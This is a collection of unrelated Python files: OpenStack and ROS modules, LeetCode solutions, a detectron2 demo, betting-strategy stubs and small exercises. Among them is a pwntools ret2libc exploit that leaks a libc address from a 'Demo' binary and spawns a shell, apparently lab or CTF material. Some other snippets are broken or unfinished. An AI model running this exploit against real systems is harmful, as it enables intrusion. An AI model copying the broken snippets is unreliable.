        temp_noise_signal.extend(noise_signal_train[noise_start_point:noise_start_point+available_length])
        left_size -= available_length
        noise_start_point += available_length
        if noise_start_point == len(noise_signal_train):
            noise_start_point = 0
    mixed_signal = sp.mix_noise(temp_input_signal, temp_noise_signal, target_dB, snr_or_ssnr, frame_size)
    # Write to the mirrored path under output_file_dir, creating folders as needed.
    temp_output_file_dir = wav_file.replace(input_file_dir, output_file_dir)
    iof.create_folder(os.path.dirname(temp_output_file_dir))
    iof.write_wav(mixed_signal, temp_output_file_dir, temp_sample_rate)
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the LogInfo action."""
from typing import List
import launch.logging
from ..action import Action
from ..frontend import Entity
from ..frontend import expose_action
from ..frontend import Parser # noqa: F401
from ..launch_context import LaunchContext
from ..some_substitutions_type import SomeSubstitutionsType
from ..substitution import Substitution
from ..utilities import normalize_to_list_of_substitutions
@expose_action('log')
class LogInfo(Action):
    """Action that logs a message when executed."""

    def __init__(self, *, msg: SomeSubstitutionsType, **kwargs):
        """Create a LogInfo action.

        :param msg: the message (substitutions allowed) to log on execution
        """
        super().__init__(**kwargs)
        self.__msg = normalize_to_list_of_substitutions(msg)
        self.__logger = launch.logging.get_logger('launch.user')

    @classmethod
    def parse(cls, entity: Entity, parser: 'Parser'):
        """Parse the `log` frontend tag into constructor arguments."""
        _, kwargs = super().parse(entity, parser)
        kwargs['msg'] = parser.parse_substitution(entity.get_attr('message'))
        return cls, kwargs

    @property
    def msg(self) -> List[Substitution]:
        """The normalized message, as a list of substitutions."""
        return self.__msg

    def execute(self, context: LaunchContext) -> None:
        """Perform each substitution against *context* and log the result."""
        text = ''.join(context.perform_substitution(sub) for sub in self.msg)
        self.__logger.info(text)
        return None
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Endpoint Group action implementations"""
import json
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
from openstackclient.identity import common
LOG = logging.getLogger(__name__)
class _FiltersReader(object):
    _description = _("Helper class capable of reading filters from files")

    def _read_filters(self, path):
        """Read and parse rules from path

        Expect the file to contain a valid JSON structure.

        :param path: path to the file
        :return: loaded and valid dictionary with filters
        :raises exception.CommandError: In case the file cannot be
            accessed or the content is not a valid JSON.

        Example of the content of the file:
            {
               "interface": "admin",
               "service_id": "1b501a"
            }

        """
        blob = utils.read_blob_file_contents(path)
        try:
            return json.loads(blob)
        except ValueError as e:
            # Wrap the JSON error in a CLI-level error with the file path.
            msg = _(
                "An error occurred when reading filters from file "
                "%(path)s: %(error)s"
            ) % {"path": path, "error": e}
            raise exceptions.CommandError(msg)
class AddProjectToEndpointGroup(command.Command):
    _description = _("Add a project to an endpoint group")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(AddProjectToEndpointGroup, self).get_parser(prog_name)
        parser.add_argument(
            'endpointgroup',
            metavar='<endpoint-group>',
            help=_('Endpoint group (name or ID)'),
        )
        parser.add_argument(
            'project',
            metavar='<project>',
            help=_('Project to associate (name or ID)'),
        )
        common.add_project_domain_option_to_parser(parser)
        return parser

    def take_action(self, parsed_args):
        """Resolve both resources and link the project to the endpoint group."""
        client = self.app.client_manager.identity

        endpointgroup = utils.find_resource(
            client.endpoint_groups, parsed_args.endpointgroup
        )
        project = common.find_project(
            client, parsed_args.project, parsed_args.project_domain
        )
        client.endpoint_filter.add_endpoint_group_to_project(
            endpoint_group=endpointgroup.id, project=project.id
        )
class CreateEndpointGroup(command.ShowOne, _FiltersReader):
    _description = _("Create new endpoint group")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(CreateEndpointGroup, self).get_parser(prog_name)
        parser.add_argument(
            'name',
            metavar='<name>',
            help=_('Name of the endpoint group'),
        )
        parser.add_argument(
            'filters',
            metavar='<filename>',
            help=_('Filename that contains a new set of filters'),
        )
        parser.add_argument(
            '--description',
            help=_('Description of the endpoint group'),
        )
        return parser

    def take_action(self, parsed_args):
        """Create the endpoint group and return its properties for display."""
        identity_client = self.app.client_manager.identity
        filters = None
        if parsed_args.filters:
            # Filters are read from a JSON file (see _FiltersReader).
            filters = self._read_filters(parsed_args.filters)
        endpoint_group = identity_client.endpoint_groups.create(
            name=parsed_args.name,
            filters=filters,
            description=parsed_args.description,
        )

        info = {}
        # 'links' is internal API plumbing, not useful to show the user.
        endpoint_group._info.pop('links')
        info.update(endpoint_group._info)
        return zip(*sorted(info.items()))
class DeleteEndpointGroup(command.Command):
    _description = _("Delete endpoint group(s)")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(DeleteEndpointGroup, self).get_parser(prog_name)
        parser.add_argument(
            'endpointgroup',
            metavar='<endpoint-group>',
            nargs='+',
            help=_('Endpoint group(s) to delete (name or ID)'),
        )
        return parser

    def take_action(self, parsed_args):
        """Delete each named group; report all failures at the end.

        Continues past individual failures so that one bad name does not
        prevent deleting the rest, then raises a summary CommandError.
        """
        identity_client = self.app.client_manager.identity
        result = 0
        for i in parsed_args.endpointgroup:
            try:
                endpoint_id = utils.find_resource(
                    identity_client.endpoint_groups, i
                ).id
                identity_client.endpoint_groups.delete(endpoint_id)
            except Exception as e:
                result += 1
                LOG.error(
                    _(
                        "Failed to delete endpoint group with "
                        "ID '%(endpointgroup)s': %(e)s"
                    ),
                    {'endpointgroup': i, 'e': e},
                )

        if result > 0:
            total = len(parsed_args.endpointgroup)
            msg = _(
                "%(result)s of %(total)s endpointgroups failed " "to delete."
            ) % {'result': result, 'total': total}
            raise exceptions.CommandError(msg)
class ListEndpointGroup(command.Lister):
    _description = _("List endpoint groups")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(ListEndpointGroup, self).get_parser(prog_name)
        list_group = parser.add_mutually_exclusive_group()
        list_group.add_argument(
            '--endpointgroup',
            metavar='<endpoint-group>',
            help=_('Endpoint Group (name or ID)'),
        )
        list_group.add_argument(
            '--project',
            metavar='<project>',
            help=_('Project (name or ID)'),
        )
        parser.add_argument(
            '--domain',
            metavar='<domain>',
            help=_('Domain owning <project> (name or ID)'),
        )
        return parser

    def take_action(self, parsed_args):
        """List endpoint groups, or cross-list by group/project filter.

        With --endpointgroup: list projects associated to that group.
        With --project: list endpoint groups associated to that project.
        With neither: list all endpoint groups.
        """
        client = self.app.client_manager.identity

        endpointgroup = None
        if parsed_args.endpointgroup:
            endpointgroup = utils.find_resource(
                client.endpoint_groups, parsed_args.endpointgroup
            )
        project = None
        if parsed_args.project:
            project = common.find_project(
                client, parsed_args.project, parsed_args.domain
            )

        # All three listings render the same columns.
        columns = ('ID', 'Name', 'Description')
        if endpointgroup:
            # List projects associated to the endpoint group
            data = client.endpoint_filter.list_projects_for_endpoint_group(
                endpoint_group=endpointgroup.id
            )
        elif project:
            data = client.endpoint_filter.list_endpoint_groups_for_project(
                project=project.id
            )
        else:
            data = client.endpoint_groups.list()

        rows = (
            utils.get_item_properties(item, columns, formatters={})
            for item in data
        )
        return (columns, rows)
class RemoveProjectFromEndpointGroup(command.Command):
    _description = _("Remove project from endpoint group")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(RemoveProjectFromEndpointGroup, self).get_parser(
            prog_name
        )
        parser.add_argument(
            'endpointgroup',
            metavar='<endpoint-group>',
            help=_('Endpoint group (name or ID)'),
        )
        parser.add_argument(
            'project',
            metavar='<project>',
            help=_('Project to remove (name or ID)'),
        )
        common.add_project_domain_option_to_parser(parser)
        return parser

    def take_action(self, parsed_args):
        """Resolve both resources and unlink the project from the group."""
        client = self.app.client_manager.identity

        endpointgroup = utils.find_resource(
            client.endpoint_groups, parsed_args.endpointgroup
        )
        project = common.find_project(
            client, parsed_args.project, parsed_args.project_domain
        )
        client.endpoint_filter.delete_endpoint_group_from_project(
            endpoint_group=endpointgroup.id, project=project.id
        )
class SetEndpointGroup(command.Command, _FiltersReader):
    _description = _("Set endpoint group properties")

    def get_parser(self, prog_name):
        """Build the argument parser for this command."""
        parser = super(SetEndpointGroup, self).get_parser(prog_name)
        parser.add_argument(
            'endpointgroup',
            metavar='<endpoint-group>',
            help=_('Endpoint Group to modify (name or ID)'),
        )
        parser.add_argument(
            '--name',
            metavar='<name>',
            help=_('New endpoint group name'),
        )
        parser.add_argument(
            '--filters',
            metavar='<filename>',
            help=_('Filename that contains a new set of filters'),
        )
        # NOTE(review): unlike --name (default None), --description defaults
        # to '', so an update issued without --description passes an empty
        # description -- confirm whether the backend treats '' as "clear".
        parser.add_argument(
            '--description',
            metavar='<description>',
            default='',
            help=_('New endpoint group description'),
        )
        return parser

    def take_action(self, parsed_args):
        """Update the named endpoint group with the supplied properties."""
        identity_client = self.app.client_manager.identity
        endpointgroup = utils.find_resource(
            identity_client.endpoint_groups, parsed_args.endpointgroup
        )
        filters = None
        if parsed_args.filters:
            # Filters are read from a JSON file (see _FiltersReader).
            filters = self._read_filters(parsed_args.filters)
        identity_client.endpoint_groups.update(
            endpointgroup.id,
            name=parsed_args.name,
            filters=filters,
            description=parsed_args.description,
        )
class ShowEndpointGroup(command.ShowOne):
    """Fetch a single endpoint group and present its attributes."""

    _description = _("Display endpoint group details")

    def get_parser(self, prog_name):
        parser = super(ShowEndpointGroup, self).get_parser(prog_name)
        parser.add_argument(
            'endpointgroup',
            metavar='<endpointgroup>',
            help=_('Endpoint group (name or ID)'),
        )
        return parser

    def take_action(self, parsed_args):
        """Return (columns, values) for the resolved endpoint group."""
        identity_client = self.app.client_manager.identity
        group = utils.find_resource(identity_client.endpoint_groups,
                                    parsed_args.endpointgroup)
        # Drop the hyperlink metadata; it is not useful in tabular output.
        group._info.pop('links')
        return zip(*sorted(group._info.items()))
|
"""
sort the distinct chars arr first and put this in a queue
sort the numbers probably using a heap
"""
from heapq import heapify, heappop
from collections import Counter
class Solution:
def isPossibleDivide(self, nums: List[int], k: int) -> bool:
distinct_els = list(set(nums))
heapify(distinct_els)
counts = Counter(nums)
while distinct_els:
smallest = distinct_els[0]
for i in range(k):
counts[smallest+i] -= 1
if counts[smallest+i] < 0:
return False
# print(counts, distinct_els)
while counts[distinct_els[0]] == 0:
heappop(distinct_els)
if len(distinct_els) == 0:
return True
return True |
# Lab 9: Unit Converter
# This lab will involve writing a program that allows the user to convert a number between units.
print('Welcome to the distance converter!' + '\n')
# Version 1
# Ask the user for the number of feet, and print out the equivalent distance in meters. Hint: 1 ft is 0.3048 m. So we can get the output in meters by multiplying the input distance by 0.3048. Below is some sample input/output.
# NOTE(review): int() rejects fractional entries such as "1.5"; float() would
# be more forgiving here.
in_feet = int(input('What is the distance in feet? >'))
in_meters = in_feet * 0.3048
print(f'The distance is {in_meters} meters.')
# Version 2
# Allow the user to also enter the units. Then depending on the units, convert the distance into meters. The units we'll allow are feet, miles, meters, and kilometers.
# 1 ft is 0.3048 m, 1 mi is 1609.34 m, 1 m is 1 m, 1 km is 1000 m
meter_dict = {'ft': 0.3048, 'm': 1, 'mi': 1609.34, 'km': 1000}
chosen_unit = input('Would you like to convert ft, mi, m, or km?')
# Re-prompt until a supported unit abbreviation is entered.
while chosen_unit not in meter_dict:
    chosen_unit = input('what is the distance in ft, mi, m, or km? >')
in_num = int(input('How many?'))
print(f'That is {in_num * meter_dict[chosen_unit]} meters.')
#Version 3
# Add support for yards, and inches: 1 yard is 0.9144 m, 1 inch is 0.0254 m
# function to convert to meter
def convert_to_meters(distance, unit=None):
    """Convert ``distance`` expressed in ``unit`` to meters.

    Args:
        distance: numeric distance value to convert.
        unit: one of 'm', 'ft', 'mi', 'km', 'in', 'yd'.  When None, falls
            back to the module-level ``user_in_unit`` chosen by the user,
            which keeps the original call sites (passing only the distance)
            working unchanged.

    Returns:
        The distance in meters, or None for an unrecognized unit (same as
        the original if/elif chain falling off the end).
    """
    # Fix: the original parameter was named ``input`` (shadowing the builtin)
    # and was never used -- the body read the globals instead.
    meters_per_unit = {
        'm': 1,
        'ft': 0.3048,
        'mi': 1609.34,
        'km': 1000,
        'in': 0.0254,
        'yd': 0.9144,
    }
    if unit is None:
        unit = user_in_unit
    factor = meters_per_unit.get(unit)
    return None if factor is None else distance * factor
user_dist = float(input('How many units would you like to convert? > '))
user_in_unit = input('Would you like to convert km, mi, m, yd, in, or ft? > ')
# NOTE(review): the unit entry is not validated here, so an unsupported unit
# makes the conversion below print None.
print(f'{user_dist} {user_in_unit} is {convert_to_meters(user_dist)} meters.')
# Version 4
# Now we'll ask the user for the distance, the starting units, and the units to convert to.
# You can think of the values for the conversions as elements in a matrix, where the rows will be the units you're converting from, and the columns will be the units you're converting to. Along the horizontal, the values will be 1 (1 meter is 1 meter, 1 foot is 1 foot, etc).
user_dist = float(input('How many units would you like to convert? > '))
user_in_unit = input('What unit are you converting from: km, mi, m, yd, in, or ft? > ')
user_out_unit = input('What unit are you converting to: km, mi, m, yd, in, or ft? > ')
distance_in_meters = convert_to_meters(user_dist)
#function to convert from meters into other units
def convert_from_meters(distance_in_meters, unit=None):
    """Convert a distance in meters into ``unit``.

    Args:
        distance_in_meters: numeric distance in meters.
        unit: one of 'm', 'ft', 'mi', 'km', 'in', 'yd'.  When None, falls
            back to the module-level ``user_out_unit`` (backward compatible
            with the original single-argument call site).

    Returns:
        The converted distance, or None for an unrecognized unit (same as
        the original if/elif chain falling off the end).
    """
    # Fix: the original read the target unit only from a global; an explicit
    # parameter makes the function usable and testable on its own.
    meters_per_unit = {
        'm': 1,
        'ft': 0.3048,
        'mi': 1609.34,
        'km': 1000,
        'in': 0.0254,
        'yd': 0.9144,
    }
    if unit is None:
        unit = user_out_unit
    factor = meters_per_unit.get(unit)
    return None if factor is None else distance_in_meters / factor
print(f'{user_dist} {user_in_unit} is {convert_from_meters(distance_in_meters)} {user_out_unit}.')
|
#!/usr/bin/env python3
"""Elementwise add two n-dimensional matrices"""
def add_matrices(mat1, mat2):
    """Return the elementwise sum of two equally-shaped nested lists.

    Scalars are detected EAFP-style: len()/zip() raise TypeError on
    non-iterables, at which point plain addition applies.  Any shape
    mismatch (at any nesting level) yields None.
    """
    try:
        if len(mat1) != len(mat2):
            return None
        summed = []
        for lhs, rhs in zip(mat1, mat2):
            row = add_matrices(lhs, rhs)
            if row is None:
                # A deeper level found a mismatch; propagate it up.
                return None
            summed.append(row)
        return summed
    except TypeError:
        # Reached the scalar leaves: plain addition.
        return mat1 + mat2
|
import random
import cv2
import os
import argparse
import numpy as np
import torch
from detectron2.config import get_cfg
from contact_hands_two_stream import CustomVisualizer
from detectron2.data import MetadataCatalog
from contact_hands_two_stream import add_contacthands_config
from datasets import load_voc_hand_instances, register_pascal_voc
from contact_hands_two_stream.engine import CustomPredictor
from detectron2.modeling import build_model
from detectron2.data import MetadataCatalog
from detectron2.checkpoint import DetectionCheckpointer, PeriodicCheckpointer
class CustomPredictorTwoStream:
    """Single-image predictor whose main model also consumes the outputs of
    a second-stream model.

    Builds the model from ``cfg``, switches it to eval mode and loads the
    weights from cfg.MODEL.WEIGHTS.
    """
    def __init__(self, cfg):
        self.cfg = cfg.clone()  # defensive copy; caller may mutate cfg later
        self.model = build_model(self.cfg)
        self.model.eval()
        self.metadata = MetadataCatalog.get(cfg.DATASETS.TEST[0])
        checkpointer = DetectionCheckpointer(self.model)
        checkpointer.load(cfg.MODEL.WEIGHTS)
        self.input_format = cfg.INPUT.FORMAT
        assert self.input_format in ["RGB", "BGR"], self.input_format
    def __call__(self, original_image, model2):
        """Run inference on one H x W x C image.

        ``model2`` is the second-stream predictor; its outputs on the same
        image are handed to the first-stream model alongside the inputs.
        """
        with torch.no_grad():
            # Reverse the channel order when the model expects RGB
            # (the incoming image is presumably BGR from cv2.imread --
            # TODO confirm against the caller).
            if self.input_format == "RGB":
                original_image = original_image[:, :, ::-1]
            height, width = original_image.shape[:2]
            # HWC uint8 -> CHW float32 tensor, the layout the model expects.
            image = torch.as_tensor(original_image.astype("float32").transpose(2, 0, 1))
            inputs = {"image": image, "height": height, "width": width}
            second_stream_outputs = inference_second_stream(model2, original_image)
            predictions = self.model([inputs], second_stream_outputs)[0]
            return predictions
def inference_second_stream(model, image):
    """Run the second-stream model on a single image and return its output."""
    return model(image)
def prepare_second_stream():
    """Build the second-stream predictor.

    Uses configs/second_stream.yaml with COCO Mask R-CNN (R-101 FPN 3x)
    weights pulled from the detectron2 model zoo URI below.
    """
    cfg2 = get_cfg()
    cfg2.merge_from_file('./configs/second_stream.yaml')
    cfg2.MODEL.WEIGHTS = "detectron2://COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x/138205316/model_final_a3ec72.pkl"
    model2 = CustomPredictor(cfg2)
    return model2
def prepare_first_stream(cfg_file, weights, roi_score_thresh):
    """Build the first-stream (contact-hands) predictor.

    Args:
        cfg_file: path to the ContactHands yaml config.
        weights: path to the trained model weights.
        roi_score_thresh: ROI-head score threshold for keeping detections.
    """
    cfg1 = get_cfg()
    add_contacthands_config(cfg1)  # register custom keys before merging the yaml
    cfg1.merge_from_file(cfg_file)
    cfg1.MODEL.ROI_HEADS.SCORE_THRESH_TEST = roi_score_thresh
    cfg1.MODEL.WEIGHTS = weights
    model1 = CustomPredictorTwoStream(cfg1)
    return model1
def add_legend(im):
    """Return ``im`` with a 50-pixel white strip appended below, carrying the
    four contact-state labels, each drawn in its state color.

    Colors are BGR tuples (OpenCV convention).
    """
    cyan, magenta, red, yellow = (255, 255, 0), (255, 0, 255), (0, 0, 255), (0, 255, 255)
    labels = ["No", "Self", "Person", "Object"]
    # Contact-state index -> label color.
    map_idx_to_color = {}
    map_idx_to_color[0], map_idx_to_color[1], map_idx_to_color[2], map_idx_to_color[3] = \
        cyan, magenta, red, yellow
    font = cv2.FONT_HERSHEY_SIMPLEX
    h, w = im.shape[:2]
    # New canvas: the original image on top, a white legend strip underneath.
    image = 255*np.ones((h+50, w, 3), dtype=np.uint8)
    image[:h, :w, :] = im
    h, w = image.shape[:2]
    offset = 0
    # Space the labels roughly evenly along the strip, 15 px above its bottom.
    for itr, word in enumerate(labels):
        offset += int(w / len(labels)) - 50
        cv2.putText(image, word, (offset, h-15), font, 1, map_idx_to_color[itr], 3)
    return image
if __name__ == '__main__':
    # Run two-stream hand-contact detection over every image in --image_dir
    # and write annotated copies (with a contact-state legend) to ./results/.
    parser = argparse.ArgumentParser(description='Arguments for evaluation')
    parser.add_argument('--image_dir', required=True, metavar='path to images', help='path to images')
    parser.add_argument('--ROI_SCORE_THRESH', required=False, metavar='threshold for hand detections', \
        help='hand detection score threshold', default=0.7)
    # NOTE(review): the help strings for --pc and --oc also say
    # "self-contact"; they look copy-pasted from --sc.
    parser.add_argument('--sc', required=False, metavar='threshold for self-contact',
        help='threshold for self-contact', default=0.5)
    parser.add_argument('--pc', required=False, metavar='threshold for person-contact',
        help='threshold for self-contact', default=0.3)
    parser.add_argument('--oc', required=False, metavar='threshold for object-contact',
        help='threshold for self-contact', default=0.6)
    args = parser.parse_args()
    images_path = args.image_dir
    roi_score_thresh = float(args.ROI_SCORE_THRESH)
    sc_thresh = float(args.sc)
    pc_thresh = float(args.pc)
    oc_thresh = float(args.oc)
    contact_thresh = [0.5, sc_thresh, pc_thresh, oc_thresh]
    # if the scores for all contact states is less than corresponding thresholds, No-Contact is predicted; 0.5 is dummy here, it is not used.
    model2 = prepare_second_stream()
    model1 = prepare_first_stream('./configs/ContactHands.yaml', './models/combined_data_model.pth', roi_score_thresh)
    images = sorted(os.listdir(images_path))
    count = 0
    for img in images:
        count += 1
        print(count)
        im = cv2.imread(os.path.join(images_path, img))
        # Resize to a fixed 720-pixel width, preserving the aspect ratio.
        height, width = im.shape[0], im.shape[1]
        ratio = height / width
        im = cv2.resize(im, (720, int(720*ratio)))
        outputs = model1(im, model2)
        v = CustomVisualizer(im[:, :, ::-1], MetadataCatalog.get("ContactHands_test"), scale=1, scores_thresh=contact_thresh)
        v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
        out_im = add_legend(v.get_image()[:, :, ::-1])
        cv2.imwrite('./results/res_' + img, out_im)
|
class Value:
    """Interactive prompts for calculator operands.

    Typing 'mrc' (memory recall) at any prompt substitutes the value stored
    in the module-level global ``val_in_mem``.
    """

    def _read_number(self, prompt):
        """Prompt once and return the entry as a float.

        'mrc' recalls the stored memory value.  Raises ValueError for
        non-numeric input and NameError if 'mrc' is used before anything was
        stored -- identical to the original inline code this replaces.
        """
        global val_in_mem
        raw = input(prompt)
        if raw == 'mrc':
            return float(val_in_mem)
        return float(raw)

    # The eight getters below previously repeated the same prompt/mrc/float
    # snippet verbatim; they now share _read_number.  Prompts are unchanged.

    def getAddNum(self):
        """Return the two operands for addition."""
        a = self._read_number("Enter the first number that you want to add: \n")
        b = self._read_number("Enter the second number that you want to add: \n")
        return a, b

    def getSubNum(self):
        """Return the two operands for subtraction."""
        a = self._read_number("Enter the first number that you want to subtract: \n")
        b = self._read_number("Enter the second number that you want to subtract: \n")
        return a, b

    def getMultiNum(self):
        """Return the two operands for multiplication."""
        a = self._read_number("Enter the first number that you want to multiply: \n")
        b = self._read_number("Enter the second number that you want to multiply: \n")
        return a, b

    def getDivNum(self):
        """Return the dividend and divisor for division."""
        a = self._read_number("Enter the first number that you want to divide: \n")
        b = self._read_number("Enter the second number that you want to divide: \n")
        return a, b

    def getSquared(self):
        """Return the number to square."""
        return self._read_number("Enter the number that you want to square: \n")

    def getRoot(self):
        """Return the number whose square root is wanted."""
        return self._read_number("Enter the number that you want to find the square root of : \n")

    def getExponent(self):
        """Return the base and the exponent."""
        a = self._read_number("Enter the base number : \n")
        b = self._read_number("Enter the exponent number : \n")
        return a, b
import json
def get_params():
    """Load and return the pipeline parameters from pipeline_params.json."""
    with open('pipeline_params.json') as handle:
        return json.load(handle)
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that a failing postbuild step lets the build fail.
"""
from __future__ import print_function
import sys
import TestGyp
from XCodeDetect import XCodeDetect
# set |match| to ignore build stderr output.
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'], match=lambda a, b: True, platforms=['darwin'])
# Xcode 3 keeps running the remaining postbuilds after one fails, so the
# stop-on-first-failure behavior verified below does not apply there.
if XCodeDetect.Version()[0] == '3':
    print('Skip test on XCode 3')
    sys.exit(2)
test.run_gyp('test.gyp', chdir='postbuild-fail')
# Exit status each generator's build tool reports for a failed build.
build_error_code = {
    'xcode': [1, 65],  # 1 for xcode 3, 65 for xcode 4 (see `man sysexits`)
    'make': 2,
    'ninja': 1,
    'xcode-ninja': [1, 65],
}[test.format]
# If a postbuild fails, all postbuilds should be re-run on the next build.
# In Xcode 3, even if the first postbuild fails the other postbuilds were
# still executed. In Xcode 4, postbuilds are stopped after the first
# failing postbuild. This test checks for the Xcode 4 behavior.
# Non-bundles
test.build('test.gyp', 'nonbundle', chdir='postbuild-fail', status=build_error_code)
test.built_file_must_not_exist('static_touch', chdir='postbuild-fail')
# Check for non-up-to-date-ness by checking if building again produces an
# error.
test.build('test.gyp', 'nonbundle', chdir='postbuild-fail', status=build_error_code)
# Bundles
test.build('test.gyp', 'bundle', chdir='postbuild-fail', status=build_error_code)
test.built_file_must_not_exist('dynamic_touch', chdir='postbuild-fail')
# Check for non-up-to-date-ness by checking if building again produces an
# error.
test.build('test.gyp', 'bundle', chdir='postbuild-fail', status=build_error_code)
test.pass_test()
|
class BetOnLoserStrategy(object):
    """Strategy that always stakes one token on player 'b' (the loser)."""

    def strategy(self, *args):
        """Ignore all inputs and bet 1 token on 'b'."""
        return 1, 'b'
class BetOnWinnerStrategy(object):
    """Strategy that always stakes one token on player 'a' (the winner)."""

    def strategy(self, model_odds_player_a, model_odds_player_b,
                 average_betting_exchange_odds_a, average_betting_exchange_odds_b,
                 *args):
        """Accept (and ignore) the odds arguments; always bet 1 on 'a'."""
        return 1, 'a'
class RecordDatesStrategy(object):
    """Never bets; records each match date, asserting chronological order."""

    def __init__(self):
        self.dates = []

    def strategy(self, model_odds_player_a, model_odds_player_b,
                 average_betting_exchange_odds_a, average_betting_exchange_odds_b,
                 match):
        """Verify dates arrive in non-decreasing order, then log this one."""
        current = match['Date']
        assert all(seen <= current for seen in self.dates)
        self.dates.append(current)
        return 0, 'a'
class BetIfBetterOddsForPredictedWinner(object):
    """Bet 1 on 'a' only when the exchange offers better odds than the model.

    NOTE(review): both odds below are placeholders (0), so the comparison is
    never true and the strategy currently never bets -- the real values still
    need to be derived from ``args``.
    """

    def strategy(self, *args):
        """Return (stake, player); currently always (0, '0') -- see class note.

        Fix: the original signature was ``strategy(*args)`` with no explicit
        ``self``; it only worked because the bound instance landed in args[0].
        """
        model_predicted_winner_odds = 0
        bet_exchange_predicted_winner_odds = 0
        if bet_exchange_predicted_winner_odds > model_predicted_winner_odds:
            return 1, 'a'
        else:
            return 0, '0'
class KellyCriterion(object):
    # Kelly staking: wager the fraction (p*(b+1) - 1)/b of the bankroll,
    # where p is the win probability and b the net winning odds.
    def strategy(*args):
        # NOTE(review): missing explicit ``self`` -- the bound instance is
        # swallowed into *args.
        # Calculate things below from arguments
        average_winning_odds = 0
        winnin_prob = 0
        losing_prob = 1 - winnin_prob
        # NOTE(review): with the placeholder odds of 0 the next line raises
        # ZeroDivisionError, and the method has no return statement -- callers
        # expecting a (stake, player) tuple like the sibling strategies will
        # break.  This is an unfinished stub.
        bet = (winnin_prob*(average_winning_odds + 1) - 1)/average_winning_odds
class AlternateBettingStrategy(object):
    """Alternates a minimal bet between players 'b' and 'a' on successive calls."""

    def __init__(self):
        # Parity flag: 0 -> bet on 'b' next, 1 -> bet on 'a' next.
        self.oddity = 0

    def strategy(self, *args):
        """Return (stake, player), flipping the target player on every call.

        Fix: the original signature was ``strategy(*args)`` with no explicit
        ``self``, so every access to ``self.oddity`` raised NameError.
        """
        choice = 'a' if self.oddity == 1 else 'b'
        self.oddity = (self.oddity + 1) % 2
        bet = 10**(-6)
        return bet, choice
class NeverBetStrategy(object):
    """Strategy that never stakes anything."""

    def strategy(*args):
        """Always return a zero bet on player 'b'."""
        return 0, 'b'
|
"""
9. 回文数
判断一个整数是否是回文数。回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。
示例 1:
输入: 121
输出: true
示例 2:
输入: -121
输出: false
解释: 从左向右读, 为 -121 。 从右向左读, 为 121- 。因此它不是一个回文数。
示例 3:
输入: 10
输出: false
解释: 从右向左读, 为 01 。因此它不是一个回文数。
进阶:
你能不将整数转为字符串来解决这个问题吗?
date : 11-13-2020
"""
class Solution:
    def isPalindrome(self, x: int) -> bool:
        """Return True when the decimal representation of x is a palindrome.

        Negative numbers are never palindromes because of the leading '-'.
        """
        digits = str(x)
        return digits == digits[::-1]
# Quick manual checks -- expected output: False, True, False.
print(Solution().isPalindrome(123))
print(Solution().isPalindrome(112211))
print(Solution().isPalindrome(-11211))
# x = 123
# s = str(x)
# print(reversed(s))
|
#!/usr/bin/env python
# NOTE(review): Python 2 only -- the bare ``print`` statements below are
# syntax errors on Python 3.
# Classic ret2libc: leak write()'s runtime address through write@plt, derive
# system() and "/bin/sh" from the fixed libc offsets, then overflow a second
# time to spawn a shell.
import pwn
libc = pwn.ELF('libc.so')
elf_Demo = pwn.ELF('Demo')
attack = pwn.process('./Demo')
# attack = remote('127.0.0.1', 23333)
plt_write = elf_Demo.symbols['write']
print '###### plt_write = ' + hex(plt_write)
got_write = elf_Demo.got['write']
print '###### got_write = ' + hex(got_write)
# Address returned to after the leak (back into the vulnerable function so
# the buffer can be overflowed a second time).
overflow_addr = 0x08048471
print '###### overflow_addr = ' + hex(overflow_addr)
# Stage 1: 140 padding bytes up to the saved return address, then
# write(1, got_write, 4) to leak write()'s libc address.
payload = 140 * 'a'
payload += pwn.p32(plt_write)
payload += pwn.p32(overflow_addr)
payload += pwn.p32(1)
payload += pwn.p32(got_write)
payload += pwn.p32(4)
print "[1] Sending payload"
attack.send(payload)
print "[2] Receiving addr_write"
addr_write = pwn.u32(attack.recv(4))
print 'addr_write = ' + hex(addr_write)
print "[3] Calculating addr_system and addr_binsh"
# Offsets within libc are fixed, so one leaked symbol pins the whole library.
addr_system = addr_write - (libc.symbols['write'] - libc.symbols['system'])
print 'addr_system = ' + hex(addr_system)
addr_binsh = addr_write - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print 'addr_binsh = ' + hex(addr_binsh)
# Stage 2: call system("/bin/sh"); overflow_addr is system's fake return.
payload_final = 140 * 'a'
payload_final += pwn.p32(addr_system)
payload_final += pwn.p32(overflow_addr)
payload_final += pwn.p32(addr_binsh)
print "[4] Sending payload_final"
attack.send(payload_final)
attack.interactive()
|
import pandas
df = pandas.read_csv("sin_dataset.csv")
# Module-level results of the centrality computations.  NOTE(review): the
# functions below assign same-named locals without a ``global`` statement,
# so these module-level values are never actually updated.
power_d = 0
power_c = 0
power_b = 0
node_d = ""
node_c = ""
node_b = ""
# NOTE(review): these calls execute before the functions are defined below,
# so running this module raises NameError here.
find_current_powers()
link_prediction()
def find_current_powers():
